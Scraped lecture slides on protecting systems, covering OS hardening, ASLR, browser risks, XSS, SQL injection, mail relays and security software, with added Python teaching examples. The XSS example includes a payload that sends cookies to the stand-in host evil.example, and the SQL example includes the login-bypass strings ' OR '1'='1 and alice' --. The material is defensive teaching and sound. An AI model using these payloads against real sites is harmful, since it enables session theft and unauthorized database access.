
Lecture Information systems security - Chapter 3: Protecting systems


Document information

Pages: 64
Size: 1.11 MB

Contents

Objectives in chapter 3: Explain how to harden operating systems, list ways to prevent attacks through a Web browser, define SQL injection and explain how to protect against it, explain how to protect systems from communications-based attacks, describe various software security applications.

Page 1

Protecting Systems

Page 3

v Explain how to harden operating systems

v List ways to prevent attacks through a Web browser

v Define SQL injection and explain how to protect against it

v Explain how to protect systems from communications-based attacks

v Describe various software security applications

Page 4

Hardening the Operating System

Page 5

v Updates to the operating system

v Protecting against buffer overflows

v Configuring operating system protections

Page 6

v Operating systems are huge and contain many bugs (errors in code)

v Linux contains 0.17 bugs per 1,000 lines of code

v Typical commercial software contains 20-30 bugs per 1,000 lines of code

v 81 bugs a day were reported for Windows Vista Beta 2

v Some of those bugs create vulnerabilities

Page 7

Managing Operating System Updates

Page 9

v Security patch

v A general software security update intended to cover vulnerabilities that have been discovered

v Hotfix addresses a specific customer situation

v Often may not be distributed outside that customer’s organization

v Service pack

v A cumulative package of all security updates plus additional features

Page 10

Update Terminology

Page 12

v Used to manage patches locally instead of relying upon the vendor’s online update service

v Advantages

v Administrators can test patches before deploying them

v Every machine is updated simultaneously

v Users cannot disable or circumvent updates

v Can save bandwidth and time

v Computers that do not have Internet access can receive updates

Page 14

v Buffer overflow

v Occurs when a process attempts to store data in random access memory (RAM) beyond the boundaries of a fixed-length storage buffer

v Extra data overflows into the adjacent memory locations and under certain conditions may cause the computer to stop functioning

v Attackers also use a buffer overflow in order to compromise a computer

Page 15

Buffer Overflow Protection

Page 16

v Data execution prevention (DEP)

v Address space layout randomization (ASLR)

Page 20

v Download Process Explorer

v http://technet.microsoft.com/en-us/sysinternals/default.aspx

v View, Show Lower Pane

v View, Lower Pane View, DLLS

v View, Select Columns, DLL tab, Base Address

v Select explorer.exe and find ntdll.dll

v Reboot to see base address change
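The Process Explorer steps above show ASLR on Windows by watching the base address of ntdll.dll move after a reboot. The following is an added example, not part of the original slides, that shows the same effect on Linux without any extra tool: it starts a fresh Python process several times, asks each one where the C library's printf symbol sits, and compares the addresses. The probe string and the fallback library name "libc.so.6" are assumptions for a glibc-based system.

```python
import subprocess
import sys

# Probe executed in a fresh interpreter: load the C library and print the
# address of its printf symbol. With ASLR enabled, each new process on Linux
# maps the library at a different base, so the printed address changes.
# (Assumption: a glibc system; "libc.so.6" is the fallback name.)
PROBE = (
    "import ctypes, ctypes.util;"
    "name = ctypes.util.find_library('c') or 'libc.so.6';"
    "lib = ctypes.CDLL(name);"
    "print(ctypes.cast(lib.printf, ctypes.c_void_p).value)"
)


def libc_printf_address() -> int:
    """Start a new process and return the address of printf inside it."""
    result = subprocess.run(
        [sys.executable, "-c", PROBE], capture_output=True, text=True, check=True
    )
    return int(result.stdout.strip())


def sample_addresses(runs: int = 3) -> list[int]:
    """Collect the printf address from several independent processes."""
    return [libc_printf_address() for _ in range(runs)]


def aslr_appears_enabled(addresses: list[int]) -> bool:
    """True if the library landed at more than one base across the runs."""
    return len(set(addresses)) > 1


if __name__ == "__main__":
    addrs = sample_addresses()
    for addr in addrs:
        print(f"printf mapped at {addr:#x}")
    print("ASLR appears", "enabled" if aslr_appears_enabled(addrs) else "disabled")
```

Linux re-randomizes shared library bases for every process, so two runs are enough. Windows randomizes the base of system DLLs such as ntdll.dll once per boot, which is why the slide tells you to reboot; if this script reports "disabled" inside a container, check whether the kernel's randomize_va_space setting or the container's personality flags have turned ASLR off.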

Page 21

How to See ASLR

Page 23

Preventing Attacks That Target the Web Browser

Page 25

v Cookies can pose a privacy risk

v Cookies can be used to track the browsing or buying habits of a user

v Defenses against cookies include disabling the creation of cookies or deleting them once they are created

Page 26

v Visiting a Web site that automatically downloads a program to run on a local computer can be dangerous

Page 27

JavaScript

Page 28

v Several defense mechanisms prevent JavaScript programs from causing serious harm:

v JavaScript cannot read or write files

v JavaScript cannot connect to other machines on your LAN

v Other security concerns remain:

v JavaScript programs can capture and send user information without the user’s knowledge or authorization

v The defense against JavaScript is to disable it within the Web browser

Page 30

Java

Page 31

v Sandbox is a defense against a hostile Java applet

v Surrounds program and keeps it away from private data and other resources on a local computer

v Two types of Java applets:

v Unsigned Java applet: program that does not come from a trusted source

v Signed Java applet: has information proving the program is from a trusted source and has not been altered

Page 32

Java

Page 33

v Set of technologies developed by Microsoft

v Not a programming language but a set of rules for how applications should share information

v ActiveX controls

v Also called add-ons or ActiveX applications

v Represent a specific way of implementing ActiveX

v Can perform many of the same functions of a Java applet, but do not run in a sandbox

v Have full access to Windows operating system

v ActiveX poses a number of security concerns

Page 34

v Nearly all ActiveX control security mechanisms are set in Internet Explorer

v ActiveX controls do not rely exclusively on Internet Explorer; they can be installed and executed independently of the browser

v The defense against ActiveX is to disable it within the Web browser

Page 36

v Cross Site Scripting (XSS) attack steps

v An attacker searches for a Web site that redisplays a failed login back to the user without filtering it (see Figures 3-8 and 3-9)

v The attacker then creates an attack URL that contains the embedded JavaScript commands

v A fake e-mail is sent to unsuspecting users with the attack URL as a modified embedded link in the e-mail

v The unsuspecting victim clicks on the attack URL and enters his username and password

Page 37

Cross Site Scripting (XSS)

Page 40

v Defenses against XSS involve both Web masters of legitimate sites as well as users

v Webmasters should check that all user input is validated and that attackers do not have the ability to inject code

v They also should be sure that all Web services and database software are patched to prevent XSS

v Users should never click on embedded links in e-mails
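The attack steps on page 36 and the webmaster defenses above can be seen in a few lines of server-side code. The following is an added example, not code from the original slides: it builds an attack URL of the kind described (the hostnames bank.example and evil.example are made up), renders the "bad login" page the vulnerable way, then renders it with the two defenses the slide asks for, input validation and output escaping.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed attack URL of the kind described on the XSS slides: the "user"
# parameter carries script instead of a user name. Hostnames are made up.
ATTACK_URL = "https://bank.example/login?" + urlencode(
    {"user": "<script>new Image().src='https://evil.example/c?'+document.cookie</script>"}
)

# Allowlist for what a user name may look like (an assumption for this example).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def username_from_url(url: str) -> str:
    """Pull the submitted user name out of the login URL's query string."""
    return parse_qs(urlparse(url).query).get("user", [""])[0]


def is_valid_username(username: str) -> bool:
    """Defense 1: validate input against an allowlist instead of trusting it."""
    return USERNAME_RE.match(username) is not None


def render_failed_login_vulnerable(username: str) -> str:
    """Echoes the submitted name back verbatim: the victim's browser runs it."""
    return f"<p>Login failed for user {username}. Please try again.</p>"


def render_failed_login_safe(username: str) -> str:
    """Defense 2: HTML-escape the value before it is placed in the markup."""
    return (
        f"<p>Login failed for user {html.escape(username, quote=True)}. "
        "Please try again.</p>"
    )


def contains_script(page: str) -> bool:
    """Crude marker used only to show which rendering would run the payload."""
    return "<script" in page.lower()


if __name__ == "__main__":
    payload = username_from_url(ATTACK_URL)
    print("valid user name?", is_valid_username(payload))
    print("vulnerable:", render_failed_login_vulnerable(payload))
    print("escaped:   ", render_failed_login_safe(payload))
```

The escaped page still shows the attacker's text, but as literal characters (`&lt;script&gt;`), so the browser displays it instead of executing it; validation on top of that rejects the request before any page is rendered. Escaping must match the context the value lands in (HTML body here); a value placed inside a JavaScript string or a URL attribute needs the escaping rules of that context.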

Page 41

v One of the most common types of attacks

v Uses a form of injection like XSS

v Hinges on an attacker being able to enter an SQL database query into a dynamic Web page

v SQL (structured query language)

v A language used to view and manipulate data that is stored in a relational database

Page 42

v Hackthissite.org

v Don't put anything true about yourself on this site; they are real criminals

Page 43

v Displays entire username database

Page 44

SQL Injection

Page 45

v Variations to the SQL injection attack

v Deleting data from the database

v Accessing the host operating system through function calls

v Retrieving a list of all usernames and passwords
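The "displays entire username database" screenshot on page 43 and the variations listed above come from one root cause: user input is spliced into the query text. The following is an added example, not code from the original slides, that reproduces the username dump against an in-memory SQLite table of constructed accounts and then shows the fix, a parameterized query, against the same inputs.

```python
import sqlite3

# Constructed sample accounts (not real data).
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "pa55word")]


def build_db() -> sqlite3.Connection:
    """Create an in-memory users table holding the constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """Builds the query by string formatting: the input becomes part of the SQL."""
    sql = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}' ORDER BY username"
    )
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """Same lookup, but the driver passes the values separately from the SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ? ORDER BY username"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Two classic payloads: the first makes the WHERE clause true for every row,
# the second comments out the password check with the SQL "--" comment marker.
DUMP_ALL_PASSWORD = "' OR '1'='1"
SKIP_PASSWORD_USERNAME = "alice' --"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, dump all:", login_vulnerable(db, "nobody", DUMP_ALL_PASSWORD))
    print("vulnerable, skip pw: ", login_vulnerable(db, SKIP_PASSWORD_USERNAME, "wrong"))
    print("parameterized, same: ", login_parameterized(db, "nobody", DUMP_ALL_PASSWORD))
```

With the parameterized query the payload is compared as a literal password value and matches nothing. Python's sqlite3 refuses to run more than one statement per execute() call, which is why a "delete data" variant such as `'; DROP TABLE users; --` is not demonstrated here; on a database and driver that accept stacked statements, the same string-building flaw allows it.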

Page 46

Hardening Web Servers

Page 47

v E-mail systems use two TCP/IP protocols to send and receive messages

v Simple Mail Transfer Protocol (SMTP) handles outgoing mail

v Post Office Protocol (POP; the current version is POP3) handles incoming mail

v IMAP (Internet Message Access Protocol)

v A more advanced protocol that solves many problems

v E-mail remains on the e-mail server

v Mail can be organized into folders and read from any computer

v Current version is IMAP4

Page 48

SMTP Open Relays
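An SMTP server is an open relay when it accepts mail from any client for any destination, which lets spammers route their traffic through it. The following is an added example, not code from the original slides: it models the relay decision a server makes at RCPT TO and scripts both sides of the envelope exchange. The server name mx.example.com, the local domain, the internal network range and the reply strings are assumptions for the example; only the reply codes follow the SMTP convention (250 accept, 554 reject).

```python
import ipaddress

# Constructed policy for a hypothetical server mx.example.com.
LOCAL_DOMAINS = {"example.com"}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]


def rcpt_response(client_ip: str, authenticated: bool, rcpt: str, open_relay: bool = False) -> str:
    """Reply to RCPT TO:<rcpt>.

    Mail for a local domain is inbound mail and is always accepted. Mail for any
    other domain is relaying: allow it only for authenticated or internal
    clients, unless the server is misconfigured as an open relay.
    """
    domain = rcpt.rpartition("@")[2].lower()
    if domain in LOCAL_DOMAINS:
        return "250 2.1.5 Recipient OK"
    if open_relay or authenticated:
        return "250 2.1.5 Recipient OK"
    if any(ipaddress.ip_address(client_ip) in net for net in INTERNAL_NETS):
        return "250 2.1.5 Recipient OK"
    return "554 5.7.1 Relay access denied"


def run_session(client_ip, authenticated, mail_from, rcpts, open_relay=False):
    """Script the envelope part of a session; returns (transcript, accepted recipients)."""
    transcript = [("S", "220 mx.example.com ESMTP")]
    transcript.append(("C", f"EHLO [{client_ip}]"))
    transcript.append(("S", "250 mx.example.com"))
    transcript.append(("C", f"MAIL FROM:<{mail_from}>"))
    transcript.append(("S", "250 2.1.0 Sender OK"))
    accepted = []
    for rcpt in rcpts:
        transcript.append(("C", f"RCPT TO:<{rcpt}>"))
        reply = rcpt_response(client_ip, authenticated, rcpt, open_relay)
        transcript.append(("S", reply))
        if reply.startswith("250"):
            accepted.append(rcpt)
    transcript.append(("C", "QUIT"))
    transcript.append(("S", "221 2.0.0 Bye"))
    return transcript, accepted


if __name__ == "__main__":
    # Constructed scenario: an external, unauthenticated client tries to send
    # to one local and one foreign recipient through the server.
    for mode in (False, True):
        lines, ok = run_session("203.0.113.7", False, "x@spam.example",
                                ["bob@example.com", "victim@other.example"], open_relay=mode)
        print("open relay" if mode else "closed relay", "accepted:", ok)
        for side, text in lines:
            print(f"  {side}: {text}")
```

The check a practitioner runs against a real server is exactly the closed-relay session above, from an external address with no authentication: if RCPT TO for a foreign domain gets 250, the server is relaying for the world.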

Page 50

v Instant messaging (IM)

v Real-time communication between two or more users

v Can also be used to chat between several users simultaneously, to send and receive files, and to receive real-time stock quotes and news

v Basic IM has several security vulnerabilities

v IM provides a direct connection to the user’s computer; attackers can use this connection to spread viruses and worms

v IM is not encrypted by default so attackers could view the content of messages

Page 51

v Steps to secure IM include:

v Keep the IM server within the organization’s firewall and only permit users to send and receive messages with trusted internal workers

v Enable IM virus scanning

v Block all IM file transfers

v Encrypt messages

Page 52

v Peer-to-peer (P2P) network

v Uses a direct connection between users

v Does not have servers, so each device simultaneously functions as both a client and a server to all other devices connected to the network

v P2P networks are typically used for connecting devices on

Page 53

v With BitTorrent, files are advertised

v BitTorrent downloads are often illegal and contain malware

Page 54

v Antivirus

v Anti-spam

v Popup blockers

v Personal software firewalls

v Host intrusion detection systems

Page 55

v Antivirus (AV) software

v Scans a computer for infections, monitors computer activity, and scans all new documents, such as e-mail attachments, that might contain a virus

v If a virus is detected, options generally include cleaning the file of the virus, quarantining the infected file, or deleting the file

v The drawback of AV software is that it must be continuously updated to recognize new viruses

v AV software uses definition files or signature files

Page 56

v Allows the user to limit or block most popups

v Can be either a separate program or a feature incorporated within a browser

v As a separate program, popup blockers are often part of a package known as antispyware

v Helps prevent computers from becoming infected by different types of spyware

Page 57

Popup Blockers

Page 58

v Two different options for installing a corporate spam filter

v Install the spam filter with the SMTP server

v See Figure 3-14

v Install the spam filter with the POP3 server

v See Figure 3-15

Page 59

Anti-Spam

Page 61

v A third method is to filter spam on the local computer

v Typically, the e-mail client contains several different features to block spam, such as:

v Level of junk e-mail protection

v Blocked senders

v Allowed senders

v Blocked top level domain list

v A final method of spam filtering is to install separate filtering software that works with the e-mail client software
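The client-side features listed above (junk protection level, blocked senders, allowed senders, blocked top-level domains) combine in a fixed order of precedence. The following is an added example, not code from the original slides, that models that precedence over a handful of constructed messages; the phrase list, the three protection levels and their thresholds are assumptions for the example.

```python
from dataclasses import dataclass


@dataclass
class Message:
    sender: str
    subject: str
    body: str


# Phrases that raise the junk score (an assumption; real clients use far larger lists).
SPAM_PHRASES = ("free money", "act now", "winner", "click here", "limited time")


class ClientSpamFilter:
    """Models the e-mail client spam features listed on the slide."""

    # Junk protection level -> minimum score that sends a message to junk.
    THRESHOLDS = {"none": None, "low": 2, "high": 1}

    def __init__(self, level="low", blocked_senders=(), allowed_senders=(), blocked_tlds=()):
        self.threshold = self.THRESHOLDS[level]
        self.blocked_senders = {s.lower() for s in blocked_senders}
        self.allowed_senders = {s.lower() for s in allowed_senders}
        self.blocked_tlds = {t.lower().lstrip(".") for t in blocked_tlds}

    @staticmethod
    def _tld(address: str) -> str:
        """'promo@deals.biz' -> 'biz'."""
        return address.rpartition("@")[2].rpartition(".")[2].lower()

    def spam_score(self, msg: Message) -> int:
        text = f"{msg.subject} {msg.body}".lower()
        return sum(phrase in text for phrase in SPAM_PHRASES)

    def classify(self, msg: Message) -> str:
        sender = msg.sender.lower()
        if sender in self.allowed_senders:          # allowed senders win outright
            return "inbox"
        if sender in self.blocked_senders or self._tld(sender) in self.blocked_tlds:
            return "junk"                           # explicit blocks come next
        if self.threshold is not None and self.spam_score(msg) >= self.threshold:
            return "junk"                           # then the content-based level
        return "inbox"


# Constructed sample mail; all addresses use reserved example domains.
SAMPLE_MESSAGES = [
    Message("boss@example.com", "Act now: winner list", "Please act now, we have a winner."),
    Message("promo@deals.biz", "Big sale", "Limited time offer, click here!"),
    Message("spammer@junk.example", "Hello", "Nothing suspicious in the text at all."),
    Message("newsletter@shop.example", "Limited time offer", "Click here for free money."),
    Message("colleague@corp.example", "Raffle", "We have a winner for the raffle."),
    Message("friend@mail.example", "Lunch", "Lunch tomorrow?"),
]


def make_filter(level: str = "low") -> ClientSpamFilter:
    return ClientSpamFilter(
        level=level,
        blocked_senders=["spammer@junk.example"],
        allowed_senders=["boss@example.com"],
        blocked_tlds=["biz"],
    )


def run_demo(level: str = "low") -> dict[str, str]:
    """Classify every sample message at the given junk protection level."""
    spam_filter = make_filter(level)
    return {m.sender: spam_filter.classify(m) for m in SAMPLE_MESSAGES}


if __name__ == "__main__":
    for level in ("none", "low", "high"):
        print(level, run_demo(level))
```

The colleague's "winner" message is the one to watch: it lands in the inbox at the low level and in junk at the high level, which is the trade-off a higher protection level makes. The boss's message scores as spam but is never filtered because the allowed list is checked first; the message from the blocked .biz domain is junked before its content is scored at all.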

Page 63

v Firewall, sometimes called a packet filter

v Designed to prevent malicious packets from entering or leaving computers

v Can be software-based or hardware-based

v Personal software firewall

v Runs as a program on a local system to protect it against attacks

v Many operating systems now come with personal software firewalls

v Or they can be installed as separate programs

Page 64

v Monitors network traffic

v Detects and possibly prevents attempts to

v HIDS are software-based and run on a local computer

v These systems can be divided into four groups:

v File system monitors

Posted: 30/01/2020, 10:22